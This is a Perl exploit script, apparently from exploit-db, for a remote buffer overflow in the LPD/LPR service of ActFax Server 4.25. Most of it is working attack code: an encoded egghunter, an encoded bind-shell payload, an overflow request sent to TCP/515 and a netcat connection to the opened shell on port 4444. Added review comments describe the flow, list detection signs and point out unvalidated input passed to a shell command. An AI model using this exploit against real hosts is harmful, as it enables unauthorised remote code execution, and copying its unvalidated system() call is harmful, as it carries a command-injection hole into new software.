ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) – Remote Buffer Overflow

  • 作者: chap0
    日期: 2011-02-16
  • 来源:https://www.exploit-db.com/exploits/16176/
  #!/usr/bin/perl
    # Exploit Title: ActFax Server (LPD/LPR) Remote Buffer Overflow Exploit
    # Date: Feb 15, 2011
    # Author: chap0
    # Software Link: http://www.actfax.com/download/actfax_setup_en.exe
    # Version: Version 4.25, Build 0221 (2010-02-11)
    # Tested on: Windows XP SP3 en
    # Big thanks to Sud0 - and an extra greetz to mr_me -RESPECT
    # Stay true my friends
    #
    # Script flow (for defenders reading this as a reference sample):
    #   1. read a host address from STDIN;
    #   2. open a TCP connection to port 515 (the LPD/LPR printer service);
    #   3. send one oversized request made of: 'A' + egghunter + 0x7D padding
    #      (257 bytes total), a 4-byte return address, an 8-byte tag and the
    #      encoded second-stage payload;
    #   4. run "nc" against the same host on TCP/4444 (the port the bind
    #      shell payload was generated for, per the comment above $shellcode).
    # Detection hints grounded in this file: an LPD request line far longer
    # than a normal control/data command, a long run of 0x7D bytes, the
    # literal tag "w00tw00t", and an unexpected listener on TCP/4444 on the
    # affected host afterwards.
    #
    # NOTE(review): the script does not enable `use strict`/`use warnings`;
    # $target and $connect below are package globals assigned without `my`.
    
    print "\nActFax Server LPD/LPR Remote Buffer Overflow\n";
    print " chap0 - www.seek-truth.net \n\n";
    
    use IO::Socket;
    
    # Host address is taken verbatim from STDIN; nothing validates it before
    # it is used as PeerAddr below and interpolated into a shell string later.
    print "Target Address Please: ";
    chomp($target = <STDIN>);
     
    # TCP/515 = LPD/LPR. The constructor's return value is not checked, so a
    # failed connect leaves $sock undefined and the later `print $sock`
    # silently does nothing useful.
    my $sock = IO::Socket::INET->new(PeerAddr => $target, PeerPort => '515', Proto => 'tcp');
    
    print "Connecting. . .\n";
    
    # egghunter EDI encoded
    # First stage: alphanumeric-encoded egghunter. Its length decides how much
    # 0x7D padding $payload1 needs to reach 256 bytes after the leading 'A'.
    my $eggedi="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIrFOqZjyo4O1RPRrJwrShXMvNuluUBzBTJOoH2Wtpp0PtLKxzlorUYzlo2UHgKOKWA";
    
    
    # ./msfpayload windows/shell_bind_tcp LPORT=4444
    # alpha2 encoded aligned with edi
    # Second stage: the encoded payload the egghunter is meant to locate.
    # The generator line above names it as a bind shell on TCP/4444, which is
    # the port the nc command at the bottom connects to.
    my $shellcode="WYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLyxniWpwpWpSPk9yuVQJr2DLKsb4pLKP".
    "RvllKPR4TnksB18VoNWaZvFvQyotqKpnLwLSQSLuRVL5p9QZo4MS1kwKRJPQB67NkrrtPlKBb5l5Qn0NkcpQhK5kpt4BjWqXPPP".
    "LKsxdXlKpX7Ps1jsjC5lg9lKdtlKS1N6uaKOvQyPllo1hOTM5QYWEhKPQel46c3M8x7KSMetpuKRpXlKshQ4GqkccVLK6lPKLK0".
    "XUL7qN3lKGtlK31jpLIpDEtUt1KSkCQPY0ZpQKOypshaO2zLKTRJKNf1MQx7CWBUPwpaxt7rSebaOSdphpLPwDfUWkOXUx8npwq".
    "uPWp7Yo4cdPPrH5ymPbKWpKOJupPrpbp2p70pPcppPaxxjvoyOKPYoYEmYO7VQkkpSphUReP4QqLoyxf1zFpPVsgcXkrIKVWPgK".
    "O8Uccv7rHMgYydx9o9oJubsrs2wbHD4Xl7Km1KOXU67OyZgU81eRN2mU1KOJuRHpcpmU4GpOykS2wv7qGdqHvsZgbV9SfIrKMqv".
    "jgW4TdWLEQUQLMstWTvpo6ePw42tpPrvqF1FG6PVrnSfV6pS2vsXqizlUoovkOHUmYkPpNRvQVIotpph7xmWwmSPKON5oKJPH5M".
    "rSfu8LfmEMmmMKOiEgL363LgzMPkKkPsEWumk0G230rporJEPPSKOHUgzA";
    
    
    # $payload1 is always 1 + 256 bytes: the 'A' prefix, the egghunter, then
    # 0x7D repeated (256 - length($eggedi)) times as filler.
    my $payload1 = "A" . $eggedi . "\x7D" x (256-length($eggedi));
    # 4-byte value placed right after the 256-byte block; the trailing comment
    # identifies it as the address of a pop x5 / retn sequence. Note the
    # final byte is 0x00 — a NUL terminator inside the request.
    my $addy = "\x7D\x4B\x4A\x00" ;# --> pop EDI/ pop ESI/ pop EBP/ pop EBX/ pop ECX/ retn
    # "w00tw00t" presumably is the tag the egghunter scans memory for, with the
    # second stage directly behind it — TODO confirm against the egghunter bytes.
    my $payload2 = "w00tw00t" . $shellcode;
    
    # Single request body: [ 'A' + egghunter + padding ][ address ][ tag + stage 2 ]
    my $payloads = $payload1.$addy.$payload2;
    
    # Unchecked write; no response from the LPD service is read or verified.
    print $sock $payloads;
    
     
    print "DONE shell in a moment. . .\n";
    
    # NOTE(review): $target (unvalidated STDIN input) is interpolated into a
    # single shell command string and executed with one-argument `system`,
    # i.e. through /bin/sh — shell metacharacters in the input would run
    # locally on the operator's machine.
    $connect = "nc -vvn $target 4444";
    
    system $connect